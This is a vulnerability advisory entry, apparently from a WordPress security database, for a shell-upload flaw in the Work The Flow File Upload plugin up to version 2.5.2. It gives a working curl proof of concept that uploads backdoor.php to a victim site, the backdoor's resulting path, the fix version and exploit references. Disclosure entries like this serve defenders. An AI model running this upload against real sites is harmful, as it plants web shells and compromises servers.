Work The Flow File Upload <= 2.5.2 - Shell Upload



Description
PoC:

curl -k -X POST -F "action=upload" -F "files=@./backdoor.php" http://VICTIM/wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/index.php

Backdoor Location:

http://VICTIM/wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/files/backdoor.php

Affects Plugin

fixed in version 2.5.3
- plugin closed

References

ExploitDB 36640
Metasploit exploit/unix/webapp/wp_worktheflow_upload
PacketStorm 131294
PacketStorm 131512
URL http://www.homelab.it/index.php/2015/04/04/wordpress-work-the-flow-file-upload-vulnerability/

Classification

Type UPLOAD
CWE CWE-434

Miscellaneous

Submitter Claudio Viviani
Submitter Website http://www.homelab.it
Submitter Twitter homelabit
Views 7078
Verified Yes
WPVDB ID 7883

Timeline

Publicly Published 2015-04-04 (over 5 years ago)
Added 2015-04-04 (over 5 years ago)
Last Updated 2019-10-21 (9 months ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin